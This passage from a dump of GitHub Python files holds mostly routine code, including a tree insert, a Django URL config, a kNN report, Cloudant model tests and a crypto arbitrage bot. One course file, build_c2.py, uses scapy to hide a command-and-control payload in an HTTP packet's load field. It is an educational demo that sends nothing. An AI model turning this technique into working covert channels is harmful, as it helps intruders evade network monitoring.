\n\n\n\n","repo_name":"dvjr22/AdviseMe-Database","sub_path":"Scripts/Modules/Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32966624480","text":"from scapy.all import *\nfrom scapy.layers.http import *\nfrom scapy.layers.inet import IP\nfrom scapy.layers.l2 import Ether\n\n\"\"\"Takes 
a listing of layers and creates a packet wit the C2.\"\"\"\n\nsettings = {\n \"src\": \"127.0.0.1\",\n \"dst\": \"8.8.8.8\"\n}\n\n\ndef build_layers(layers):\n p = Ether() / IP(src=settings[\"src\"], dst=settings[\"dst\"])\n for layer in layers.split(\":\")[2:]: # TCP\n try:\n layer = layer.replace(\" \", \"\")\n if layer == \"HTTP1\":\n layer = \"HTTP\"\n l = globals()[layer]() # call func with a string\n p.add_payload(l) # add additional layers to the packet\n except:\n return p\n return p\n\n\ndef set_payload(packet, layers, data):\n \"\"\"C2 into the `load` value of the layers.\"\"\"\n p = packet\n l = layers.split(\":\")\n for layer in l[:-1]:\n if packet.haslayer(layer):\n p = p[layer]\n else: # nested field, i.e DNS\n p = getattr(p, layer)\n p.setfieldval(l[-1], data) # `load` value of layers\n return packet\n\n\nif __name__ == \"__main__\":\n # Listing of layers we want in our packet\n layers = \"Ethernet:IP:TCP:HTTP 1:HTTP Response:Raw:load\"\n packet = build_layers(layers)\n data = \"Hello\" # C2\n packet = set_payload(packet, layers, data)\n packet.show()\n","repo_name":"annaviper/advanced_python_for_cybersec","sub_path":"02_command_control_and_finding_credentials/2_1_establishing_command_and_control/build_c2.py","file_name":"build_c2.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43758471522","text":"class Node :\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n def __repr__(self):\n if self.left is not None and self.right is not None:\n return f\"{self.left} <- Node({self.val}) -> {self.right}\"\n\n if self.left is not None :\n return f\"{self.left} <- Node({self.val}) -> None\"\n\n if self.right is not None :\n return f\"None <- Node({self.val}) -> {self.right}\"\n\n return f\"None <- Node({self.val}) ->None\"\n\ndef insert_node(head, data) :\n if head is None :\n head = Node(data)\n return head\n\n if head.val < data :\n head.right = insert_node(head.right, data)\n else :\n head.left = insert_node(head.left, data)\n\n return head\n\nif __name__ == \"__main__\":\n a = Node(1)\n a.left = Node(2)\n a.right = Node(7)\n\n print(insert_node(a, 10))\n print(insert_node(a, 6))","repo_name":"leolo0626/effective_python","sub_path":"algorithm/Recursion/insert_value_to_binary_search_tree.py","file_name":"insert_value_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17298203072","text":"import pickle\nfrom typing import Any\n\n\ndef load_pickle(path: str, **kwargs: Any) -> Any:\n with open(path, \"rb\") as f:\n return pickle.load(f, **kwargs) # noqa: S301\n\n\ndef write_pickle(pickle_serializable_object: Any, path: str, **kwargs: Any) -> None:\n with open(path, \"wb\") as f:\n pickle.dump(\n pickle_serializable_object, f, protocol=pickle.HIGHEST_PROTOCOL, **kwargs\n )\n","repo_name":"hetida/hetida-designer","sub_path":"runtime/hetdesrun/adapters/local_file/handlers/pickle.py","file_name":"pickle.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"78"} +{"seq_id":"10513600802","text":"import numpy as np\nimport random\n\n\nclass Agent(object):\n\n def __init__(self, name, env, learning, config):\n self.name = name\n self.env = env\n self.config = config\n self.learning = learning\n\n def choice_action(self, state):\n 
self.learning.check_state_exists(state)\n\n if np.random.uniform() < self.config.epsilon:\n state_action = self.learning.q_table[state, :]\n action_index = np.random.choice(np.where(state_action == np.max(state_action))[0])\n else:\n action_index = random.randint(0, self.env.n_actions - 1)\n action_name = self.env.action_space[action_index]\n\n return action_index, action_name\n","repo_name":"ppgdl/Reinforcement-Tutorial","sub_path":"utils/Maze/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3785219473","text":"# car/urls.py\nfrom django.conf.urls import url\n\nfrom .import views\n\nurlpatterns = [\n\n url(r'^dashboard/$', views.not_authorized, name='not_authorized'),\n url(r'^(?P[0-9]+)/$', views.car_detail, name='car_detail'),\n url(r'^car_maker/(?P[0-9]+)/$', views.car_maker_detail, name='maker_detail'),\n url(r'^car_list/$', views.car_list, name='car_list'),\n url(r'^car_maker_list/$', views.car_maker_list, name='maker_list'),\n]\n","repo_name":"diek/cars_project2","sub_path":"car/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23784207332","text":"\"\"\"CLI/Commands - Get an API token.\"\"\"\n\nimport click\n\nfrom ...core.api.user import get_user_brief\nfrom .. import decorators\nfrom ..exceptions import handle_api_exceptions\nfrom ..utils import maybe_spinner\nfrom .main import main\n\n\n@main.command()\n@decorators.common_cli_config_options\n@decorators.common_cli_output_options\n@decorators.common_api_auth_options\n@decorators.initialise_api\n@click.pass_context\ndef whoami(ctx, opts):\n \"\"\"Retrieve your current authentication status.\"\"\"\n click.echo(\"Retrieving your authentication status from the API ... \", nl=False)\n\n context_msg = \"Failed to retrieve your authentication status!\"\n with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg):\n with maybe_spinner(opts):\n is_auth, username, email, name = get_user_brief()\n click.secho(\"OK\", fg=\"green\")\n click.echo(\"You are authenticated as:\")\n if not is_auth:\n click.secho(\"Nobody (i.e. 
anonymous user)\", fg=\"yellow\")\n else:\n click.secho(\n \"%(name)s (slug: %(username)s\"\n % {\n \"name\": click.style(name, fg=\"cyan\"),\n \"username\": click.style(username, fg=\"magenta\"),\n },\n nl=False,\n )\n\n if email:\n click.secho(\n f\", email: {click.style(email, fg='green')}\",\n nl=False,\n )\n\n click.echo(\")\")\n","repo_name":"cloudsmith-io/cloudsmith-cli","sub_path":"cloudsmith_cli/cli/commands/whoami.py","file_name":"whoami.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"72281223613","text":"import pandas as pd\r\nimport numpy as np\r\nfrom mldm_hw1_02 import knn\r\n\r\n\r\ndef my_confusion_matrix(y_test, y_pred):\r\n matrix = np.zeros((10, 10))\r\n for i in range(len(y_test)):\r\n matrix[y_test[i]][y_pred[i]] += 1 # (real, predict)\r\n\r\n return matrix\r\n\r\n\r\ndef my_classification_report(cm, len):\r\n precision = []\r\n recall = []\r\n f1_score = []\r\n\r\n for i in range(0, len):\r\n tp = cm[i][i] # tp\r\n fn = np.sum(cm[i])-tp # fn\r\n fp = np.sum(cm[:, i])-tp # fp\r\n tn = np.sum(cm)-(tp+fn+fp) # tn\r\n\r\n precision.append(round(tp/(tp+fp), 2)) # precision list\r\n recall.append(round(tp/(tp+fn), 2)) # recall list\r\n f1_score.append(round(\r\n 2*precision[i]*recall[i]/(precision[i]+recall[i]), 2)) # f1_score list\r\n\r\n report = [precision, recall, f1_score]\r\n report = np.array(report)\r\n return report\r\n\r\n\r\n# open file\r\nwith open(\"digits_train.csv\", 'r') as trainfile:\r\n df = pd.read_csv(trainfile, names=[x for x in range(0, 785)])\r\nwith open(\"digits_test.csv\", 'r') as testfile:\r\n test = pd.read_csv(testfile, names=[x for x in range(0, 785)])\r\n\r\n# split label from data\r\nX = np.array(df.drop(0, axis=1).values)\r\ny = np.array(df[0].values)\r\n\r\nX_test = np.array(test.drop(0, axis=1).values)\r\ny_test = np.array(test[0].values)\r\n\r\n\r\nfit = knn.train(k=4, distance='euclidean', cv=0) # euclidean\r\n# fit = knn.KNNClassifier(k=4, distance='manhattan') # manhattan\r\n# fit = knn.KNNClassifier(k=4, distance='l_infinity') # L_infinity\r\ntrain = fit(X, y)\r\n\r\nprint(\"=\"*25, \"Test with Train Data\", \"=\"*25)\r\nscore, y_pred = knn.predict(X, y, train) # test the train data\r\n\r\ncm = my_confusion_matrix(y, y_pred) # confusion matrix\r\nreport = my_classification_report(cm, 10).transpose() # report\r\n\r\nreport = pd.DataFrame(report, columns=['Precision', 'Recall', 'F1-Score']) # change to data frame\r\n\r\nprint(\"\\nTrain Confusion Matrix \\n\", cm)\r\nprint(\"\\nTrain Report\\n\", report)\r\nprint(\"<>\"\r\n .format(score*100))\r\n\r\nprint(\"=\"*25, \"Test with Test Data\", \"=\"*25)\r\nscore, y_pred = knn.predict(X_test, y_test, train) # test the test data\r\n\r\ncm = my_confusion_matrix(y_test, y_pred) # confusion matrix\r\nreport = my_classification_report(cm, 10).transpose() # report\r\n\r\nreport = pd.DataFrame(report, columns=['Precision', 'Recall', 'F1-Score']) # change to data frame\r\n\r\nprint(\"\\nTest Confusion Matrix \\n\", cm)\r\nprint(\"\\nTest Report\\n\", report)\r\nprint(\"<>\"\r\n .format(score*100))\r\n","repo_name":"jaypae95/ml_dm","sub_path":"mldm_hw1/mldm_hw1_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2123681726","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndict = {\n 'unidade': [40,60,80,100,120,140,160],\n 'rendimento': 
[15.9,18.8,21.6,25.2,28.7,30.4,30.7]\n}\n\nx = dict['unidade']\ny = dict['rendimento']\n\nmatriz_corr = [x, y]\nrho = np.corrcoef(matriz_corr)\n\nx_log = []\ny_log = []\n\nfor i in range(len(x)):\n x_log.append(np.log(x[i]))\n y_log.append(np.log(y[i]))\n\nmatriz_corr_log = [x_log, y_log]\nrho_log = np.corrcoef(matriz_corr_log)\n\nprint(rho)\nprint(rho_log)\n\nplt.scatter(x, y)\nplt.show()\n\nplt.scatter(x_log, y_log)\nplt.show()","repo_name":"ThiagoMargoni/Senai-University-Files","sub_path":"2023.1/Data Science/Aula 5/Lista 4/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73148281853","text":"from tkinter import *\n\nwindow = Tk()\nwindow.title(\"Miles to Km Converter\")\nwindow.minsize(width=300, height=150)\nwindow.config(padx=30, pady=30)\n\ndef miles_to_km(miles):\n return miles * 1.609\n\ndef button_clicked():\n miles = float(miles_input.get())\n new_result = miles_to_km(miles)\n result_label.config(text=new_result)\n\n# Label \"is equal to\"\nequal_to_label = Label(text=\"is equal to\", font=(\"Verdana\"))\nequal_to_label.grid(column=0, row=1)\n\n# Label Result\nresult_label = Label(text=\"0\", font=(\"Verdana\"))\nresult_label.grid(column=1, row=1)\n\n# Label Km\nkm_label = Label(text=\"Km\", font=(\"Verdana\"))\nkm_label.grid(column=2, row=1)\n\n# Label Miles\nMiles_label = Label(text=\"Miles\", font=(\"Verdana\"))\nMiles_label.grid(column=2, row=0)\n\n# Button Calculate\ncalculate_button = Button(text=\"Calculate\", font=(\"Verdana\"), command=button_clicked)\ncalculate_button.grid(column=1, row=2)\n\n# Entry Miles\nmiles_input = Entry(width=7, font=(\"Verdana\"))\nmiles_input.grid(column=1, row=0)\n\n\nwindow.mainloop()","repo_name":"mathschagas/100DaysOfCode","sub_path":"Day 027/kilometers-converter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29009384315","text":"import pandas as pd\nimport numpy as np\nimport re\nimport string\nfrom nltk.stem.snowball import SnowballStemmer\nsnowball = SnowballStemmer('english')\n\n\ndef get_clean_lyrics(lyrics):\n '''\n get rid of all the unnecessary tags, symbols, line breaks, etc.\n returns a numpy array with the cleaned lyrics.\n\n '''\n #lower case\n clean = all_lyrics.str.lower()\n\n #reference to verse and chorus\n clean = clean.str.replace('chorus:','')\n clean = clean.str.replace('verse:','')\n\n #new line breaks\n clean = clean.str.replace('\\n', ' ')\n clean = clean.str.replace('\\r', ' ')\n\n #untranslated symbols\n clean = clean.str.replace('amp', ' ')\n clean = clean.str.replace('quot', ' ')\n\n #stuff like repeat 5x\n clean = clean.str.replace(r'[\\d]x','')\n\n #verse and chorus references\n clean = clean.str.replace(r'verse [\\d]','')\n\n #keep words whitespace and '\n clean = clean.str.replace(r'[^\\w\\s\\']','')\n\n clean = clean.str.replace(r'[\\d]','')\n\n return clean\n\n\ndef get_stop_words_list():\n '''\n Prepare a list of (stop)words to be removed from the cleaned lyrics.\n\n '''\n\n #use english, french, and spanish stop words\n stop_words_eng = get_stop_words('english')\n stop_words_fr = get_stop_words('french')\n stop_words_sp = get_stop_words('spanish')\n\n stop_words = stop_words_eng + stop_words_fr + stop_words_sp\n\n #compile a list of words that can be considered noise\n noise_words = [\n \"a\",\"an\", \"an'\", 
\"about\",\"above\",\"ain't\",\"ain\", \"aint\", \"all\",\"along\",\"also\",\"although\",\n \"am\",\"an\",\"any\",\"are\",\"aren't\", \"away\", \"as\",\"at\",\"ay\", \"back\", \"be\",\"because\",\n \"'cause\",\"cause\", \"bit\", \"been\",\"but\",\"by\",\"can\", \"can't\", \"cant\",\"cannot\",\"could\",\n \"couldn't\",\"come\",\"comes\",\"cause\", \"chorus\", \"did\",\"didn't\",\"do\", \"don\", \"does\",\n \"doesn't\",\"don't\", \"dont\", \"don'\", \"em'\",\"else\", \"e.g.\",\"either\",\"etc\",\"etc.\",\n \"even\",\"ever\",\"every\", \"for\",\"from\", \"further\",\"get\",\"gets\",\"give\", \"gives\",\n \"going\", \"goin'\", \"goes\", \"go\",\"gonna\", \"gotta\", \"got\",\"had\",\"hardly\",\"has\",\n \"hasn't\",\"having\",\"he\", \"hence\",\"her\",\"here\",\"hereby\",\"herein\", \"hereof\",\"hereon\",\n \"hereto\",\"herewith\",\"him\", \"his\",\"how\",\"however\",\"i\",\"i'll\", \"ill\",\n \"im'\",\"im\", \"i.e.\",\"if\",\"into\",\"it\",\"it's\",\"its\",\"just\", \"know\", \"ic\", \"lyricchecksum\",\n \"lyricid\", \"like\",\"let\", \"make\", \"me\",\"more\",\"most\", \"mr\",\"my\",\"near\",\"nor\",\"now\",\"of\",\n \"ok\",\"on\", \"one\",\"onto\",\"other\",\"our\",\"out\",\"over\",\"put\", \"really\", \"re\", \"said\",\n \"same\", \"say\", \"see\", \"she\",\"should\",\"shouldn't\",\"since\",\"so\",\"some\",\"such\",\"take\",\n \"than\",\"that\",\"thats\", \"that's\", \"the\",\"their\",\"them\",\"then\",\"there\",\"thereby\",\n \"therefore\",\"therefrom\",\"therein\", \"tell\", \"thereof\",\"thereon\",\"thereto\",\"therewith\",\n \"these\",\"they\",\"this\",\"those\",\"through\", \"thing\",\"try\", \"thus\",\"to\",\"too\",\"under\",\n \"until\",\"till'\", \"unto\",\"upon\",\"us\",\"very\",\"viz\", \"want\", \"was\", \"wasn't\", \"wanna\",\n \"whatcha\", \"way\", \"we\",\"went\",\"were\",\"what\",\"when\", \"where\",\"whereby\",\"wherein\",\n \"whether\",\"which\",\"while\", \"will\", \"well\", \"wit\", \"who\",\"whom\",\n \"whose\",\"why\",\"with\",\"without\",\"would\",\"x\", \"you\",\"your\",\"you're\", \"youre\", \"y'all\",\n \"verse\", \"repeat\", \"chorus\", \"oh\",\"ohh\",\"ooh\", \"ah\", \"ahh\", \"yeah\",\"yes\", \"u\", \"mmm\",\n \"uh\", \"hey\", \"la\", \"na\", \"yo\", \"ya\", \"yeh\", \"woah\",\"whoa\", \"huh\", \"woah\", \"yea\",\n \"doo\", \"de\", \"nah\", \"da\", \"ha\", \"ba\", \"wo\", \"wow\", \"woo\", \"ooo\", \"dee\", \"dum\",\n \"hmm\", \"ve\", \"ll\", \"t\", \"muhahahahahahaha\"\n ]\n\n remove_words = stop_words + noise_words\n remove_words = sorted(remove_words)\n\n return remove_words\n\n\nif __name__ == '__main__':\n\n d = path.dirname('/Users/Samaneh/Desktop/LyricsAnalyzer/')\n df = pd.DataFrame.from_csv(path.join(d, 'data/final_data.csv'), sep='\\t')\n song_list = df[['recording_id', 'year', 'genre_cluster', 'artist_name', 'track_name', 'lyrics_artist', 'lyrics_track', 'lyrics']]\n genres = np.array(song_list['genre_cluster'])\n\n all_lyrics = df['lyrics']\n clean_lyrics = get_clean_lyrics(all_lyrics)\n\n df_clean_lyrics = pd.DataFrame(get_clean_lyrics(all_lyrics))\n df_clean_lyrics.to_csv(path.join(d, 'data/clean_lyrics.csv'), sep='\\t', encoding='utf-8')\n","repo_name":"samsadi/lyrics_analyzer","sub_path":"code/clean_lyrics.py","file_name":"clean_lyrics.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37965766339","text":"\"\"\"\nRecommendation Test Suite\nTest cases can be run with the following:\nnosetests -v --with-spec --spec-color\n\"\"\"\n\nimport 
os\nimport json\nimport logging\nimport unittest\nfrom cloudant.client import Cloudant\nfrom time import sleep # use for rate limiting Cloudant Lite :(\nfrom service.models import Recommendation, DataValidationError\n\nVCAP_SERVICES = {\n 'cloudantNoSQLDB': [\n {'credentials': {\n 'username': 'admin',\n 'password': 'pass',\n 'host': '127.0.0.1',\n 'port': 5984,\n 'url': 'http://admin:pass@127.0.0.1:5984'\n }\n }\n ]\n}\n\n######################################################################\n# T E S T C A S E S\n######################################################################\nclass TestRecommendations(unittest.TestCase):\n\t\"\"\" Test Cases for Recommendation Model \"\"\"\n\tlogger = logging.getLogger(__name__)\n\n\tdef setUp(self):\n\t\tsleep(0.5)\n\t\tRecommendation.init_db()\n\t\tsleep(0.5)\n\t\tRecommendation.remove_all()\n\t\tsleep(0.5)\n\n\tdef test_db(self):\n\t\tRecommendation.database = None\n\t\tRecommendation.database = Recommendation.client.create_database('recommendations')\n\n\n\n\n\tdef test_create_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"suggestionId\", \"categoryId\")\n\t\tself.assertNotEqual(recommendation, None)\n\t\tself.assertEqual(recommendation.id, 1)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\t\tself.assertEqual(recommendation.suggestionId, \"suggestionId\")\n\t\tself.assertEqual(recommendation.categoryId, \"categoryId\")\n\n\n\tdef test_delete_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"recommended\", \"categoryId\")\n\t\trecommendation.save()\n\t\tself.assertEqual(len(Recommendation.all()), 1)\n\t\trecommendation.delete()\n\t\tself.assertEqual(len(Recommendation.all()), 0)\n\n\tdef test_serialize_a_recommendation(self):\n\t\trecommendation = Recommendation(1,\"iPhone\", \"Pixel\", \"Digital Prodct\")\n\t\tdata = recommendation.serialize()\n\t\tself.assertNotEqual(data, None)\n\t\tself.assertNotIn('_id', data)\n\t\tself.assertEqual(data['id'], 1)\n\t\tself.assertEqual(data['productId'], \"iPhone\")\n\t\tself.assertEqual(data['suggestionId'], \"Pixel\")\n\t\tself.assertEqual(data['categoryId'], \"Digital Prodct\")\n\n\tdef test_deserialize_a_recommendation(self):\n\t\tdata = {\"id\": 1, \"productId\": \"iPhone\", \"suggestionId\": \"Pixel\", \"categoryId\": \"Digital Prodct\"}\n\t\trecommendation = Recommendation(id=data[\"id\"])\n\t\trecommendation.deserialize(data)\n\t\tself.assertNotEqual(recommendation, None)\n\t\tself.assertEqual(recommendation.id, 1)\n\t\tself.assertEqual(recommendation.productId, \"iPhone\")\n\t\tself.assertEqual(recommendation.suggestionId, \"Pixel\")\n\t\tself.assertEqual(recommendation.categoryId, \"Digital Prodct\")\n\n\tdef test_deserialize_with_no_productId(self):\n\t\t#recommendation = Recommendation()\n\t\tdata = {\"id\":1, \"suggestionId\": \"Pixel\", \"categoryId\": \"Digital Prodct\"}\n\t\trecommendation = Recommendation(id=data[\"id\"])\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, data)\n\n\tdef test_deserialize_with_no_data(self):\n\t\trecommendation = Recommendation(0)\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, None)\n\n\tdef test_deserialize_with_bad_data(self):\n\t\trecommendation = Recommendation(0)\n\t\tself.assertRaises(DataValidationError, recommendation.deserialize, \"string data\")\n\n\tdef test_find_a_recommendation(self):\n\t\tsaved_recommendation = Recommendation(1, \"productId\", \"recommended\", 
\"categoryId\")\n\t\tsaved_recommendation.save()\n\t\trecommendation = Recommendation.find(saved_recommendation.id)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\t\tself.assertIsNot(recommendation, None)\n\t\tself.assertEqual(recommendation.id, saved_recommendation.id)\n\t\tself.assertEqual(recommendation.productId, \"productId\")\n\n\tdef test_update_a_recommendation(self):\n\t\trecommendation = Recommendation(1, \"productId\", \"recommended\", \"categoryId\")\n\t\trecommendation.save()\n\n\t\trecommendation.categoryId = \"newcategoryId\"\n\t\trecommendation.save()\n\t\trecommendations = Recommendation.all()\n\t\tself.assertEqual(recommendations[0].categoryId, \"newcategoryId\")\n\n\tdef test_find_by_categoryId(self):\n\t\tRecommendation(1,\"productId1\", \"recommended1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"recommended2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_categoryId(\"categoryId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].categoryId, \"categoryId1\")\n\n\tdef test_find_by_suggestionId(self):\n\t\tRecommendation(1, \"productId1\", \"suggestionId1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"suggestionId2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_suggestionId(\"suggestionId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].suggestionId, \"suggestionId1\")\n\n\tdef test_find_by_productId(self):\n\t\tRecommendation(1, \"productId1\", \"suggestionId1\", \"categoryId1\").save()\n\t\tRecommendation(2, \"productId2\", \"suggestionId2\", \"categoryId2\").save()\n\t\trecommendations = Recommendation.find_by_productId(\"productId1\")\n\t\tself.assertEqual(len(recommendations), 1)\n\t\tself.assertEqual(recommendations[0].productId, \"productId1\")\n\n\tdef test_init_db(self):\n\t\tRecommendation.init_db(\"recommendations\")\n\t\tself.assertIsNotNone(Recommendation.client)\t\n\n######################################################################\n# M A I N\n######################################################################\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NYUDevOps-Fall18-Recommendations/recommendations","sub_path":"tests/test_recommendation.py","file_name":"test_recommendation.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3563991186","text":"a = int(input())\nb = int(input())\nch = 0\nnech = 0\nn = a\nwhile (n >= a)and(n <= b)and(a <= 100)and(b <= 100):\n if n % 2 == 0:\n ch = ch + n\n n = n + 1\n else:\n nech = nech + n\n n = n + 1\n\n\nraz = ch - nech\n\nprint(raz)\n","repo_name":"MrFzovpec/olymp","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10475284314","text":"import copyreg\nimport getpass\nimport logging\nimport os\nimport pickle\nimport pprint\nimport time\nimport traceback\nimport uuid\n\nimport ccxt\nimport schedule\nimport yaml\n\nimport autotrageur.bot.arbitrage.arbseeker as arbseeker\nimport fp_libs.db.maria_db_handler as db_handler\nfrom autotrageur.bot.arbitrage.autotrageur import Autotrageur\nfrom autotrageur.bot.arbitrage.fcf.balance_checker import FCFBalanceChecker\nfrom autotrageur.bot.arbitrage.fcf.fcf_checkpoint import FCFCheckpoint\nfrom 
autotrageur.bot.arbitrage.fcf.fcf_checkpoint_utils import \\\n pickle_fcf_checkpoint\nfrom autotrageur.bot.arbitrage.fcf.fcf_stat_tracker import FCFStatTracker\nfrom autotrageur.bot.arbitrage.fcf.strategy import FCFStrategyBuilder\nfrom autotrageur.bot.common.config_constants import (TWILIO_RECIPIENT_NUMBERS,\n TWILIO_SENDER_NUMBER)\nfrom autotrageur.bot.common.db_constants import (FCF_AUTOTRAGEUR_CONFIG_COLUMNS,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_ID,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_START_TS,\n FCF_AUTOTRAGEUR_CONFIG_TABLE,\n FCF_MEASURES_PRIM_KEY_ID,\n FCF_MEASURES_TABLE,\n FCF_STATE_PRIM_KEY_ID,\n FCF_STATE_TABLE,\n FOREX_RATE_PRIM_KEY_ID,\n FOREX_RATE_TABLE,\n TRADE_OPPORTUNITY_PRIM_KEY_ID,\n TRADE_OPPORTUNITY_TABLE,\n TRADES_PRIM_KEY_SIDE,\n TRADES_PRIM_KEY_TRADE_OPP_ID,\n TRADES_TABLE)\nfrom autotrageur.bot.trader.ccxt_trader import CCXTTrader\nfrom autotrageur.bot.trader.dry_run import DryRunExchange\nfrom fp_libs.constants.ccxt_constants import API_KEY, API_SECRET, PASSWORD\nfrom fp_libs.constants.decimal_constants import TEN, ZERO\nfrom fp_libs.db.maria_db_handler import InsertRowObject\nfrom fp_libs.email_client.simple_email_client import send_all_emails\nfrom fp_libs.fiat_symbols import FIAT_SYMBOLS\nfrom fp_libs.logging.logging_utils import fancy_log\nfrom fp_libs.security.encryption import decrypt\nfrom fp_libs.twilio.twilio_client import TwilioClient\nfrom fp_libs.utilities import (keyfile_to_map, num_to_decimal, split_symbol,\n to_bytes, to_str)\n\n# Default error message for phone call.\nDEFAULT_PHONE_MESSAGE = \"Please check logs and e-mail for full stack trace.\"\n\n\nclass AutotrageurAuthenticationError(Exception):\n \"\"\"Incorrect credentials or exchange unavailable when attempting to\n communicate through an exchange's API.\"\"\"\n pass\n\n\nclass FCFAlertError(Exception):\n \"\"\"Error indicating that one or more methods of communication for `_alert`\n failed.\"\"\"\n pass\n\n\nclass IncompleteArbitrageError(Exception):\n \"\"\"Error indicating an uneven buy/sell base amount.\"\"\"\n pass\n\n\nclass InsufficientCryptoBalance(Exception):\n \"\"\"Thrown when there is not enough crypto balance to fulfill the matching\n sell order.\"\"\"\n pass\n\n\nclass IncorrectStateObjectTypeError(Exception):\n \"\"\"Raised when an incorrect object type is being used as the bot's\n state. For fcf_autotrageur, FCFCheckpoint is the required object type.\n \"\"\"\n pass\n\n\nclass FCFAutotrageur(Autotrageur):\n \"\"\"The fiat-crypto-fiat Autotrageur.\n\n This implementation of the Autotrageur polls two specified fiat to\n crypto markets. 
Given the target high and low spreads between the\n fiat currencies, this algorithm will execute a trade in the\n direction of exchange two (buy crypto on exchange one, sell crypto\n on exchange two) if the calculated spread is greater than the\n specified target high; vice versa if the calculated spread is less\n than the specified target low.\n \"\"\"\n def __load_twilio(self, twilio_cfg_path):\n \"\"\"Loads the Twilio configuration file and tests the connection to\n Twilio APIs.\n\n Args:\n twilio_cfg_path (str): Path to the Twilio configuration file.\n \"\"\"\n with open(twilio_cfg_path, 'r') as ymlfile:\n self.twilio_config = yaml.safe_load(ymlfile)\n\n self.twilio_client = TwilioClient(\n os.getenv('ACCOUNT_SID'), os.getenv('AUTH_TOKEN'), self.logger)\n\n # Make sure there is a valid connection as notifications are a critical\n # service to the bot.\n self.twilio_client.test_connection()\n\n def __parse_keyfile(self, keyfile_path, pi_mode=False):\n \"\"\"Parses the keyfile given in the arguments.\n\n Prompts user for a passphrase to decrypt the encrypted keyfile.\n\n Args:\n keyfile_path (str): The path to the keyfile.\n pi_mode (bool): Whether to decrypt with memory limitations to\n accommodate raspberry pi. Default is False.\n\n Raises:\n IOError: If the encrypted keyfile does not open, and not in\n dryrun mode.\n\n Returns:\n dict: Map of the keyfile contents, or None if dryrun and\n unavailable.\n \"\"\"\n try:\n pw = getpass.getpass(prompt=\"Enter keyfile password:\")\n with open(keyfile_path, \"rb\") as in_file:\n keys = decrypt(\n in_file.read(),\n to_bytes(pw),\n pi_mode=pi_mode)\n\n str_keys = to_str(keys)\n return keyfile_to_map(str_keys)\n except Exception:\n logging.error(\"Unable to load keyfile.\", exc_info=True)\n if not self._config.dryrun:\n raise IOError(\"Unable to open file: %s\" % keyfile_path)\n else:\n logging.info(\"**Dry run: continuing with program\")\n return None\n\n def __persist_config(self):\n \"\"\"Persists the configuration for this `fcf_autotrageur` run.\"\"\"\n fcf_autotrageur_config_row = db_handler.build_row(\n FCF_AUTOTRAGEUR_CONFIG_COLUMNS, self._config._asdict())\n config_row_obj = InsertRowObject(\n FCF_AUTOTRAGEUR_CONFIG_TABLE,\n fcf_autotrageur_config_row,\n (FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_ID,\n FCF_AUTOTRAGEUR_CONFIG_PRIM_KEY_START_TS))\n\n db_handler.insert_row(config_row_obj)\n db_handler.commit_all()\n\n def __persist_forex(self, trader):\n \"\"\"Persists the current forex data.\n\n NOTE: The trader's forex_id is updated here and is cached until\n the next update.\n\n Args:\n trader (CCXTTrader): The CCXTTrader to use.\n \"\"\"\n trader.forex_id = str(uuid.uuid4())\n row_data = {\n 'id': trader.forex_id,\n 'quote': trader.quote,\n 'rate': trader.forex_ratio,\n 'local_timestamp': int(time.time())\n }\n forex_row_obj = InsertRowObject(\n FOREX_RATE_TABLE,\n row_data,\n (FOREX_RATE_PRIM_KEY_ID,))\n db_handler.insert_row(forex_row_obj)\n db_handler.commit_all()\n\n def __update_forex(self, trader):\n \"\"\"Update the internally stored forex ratio and store in 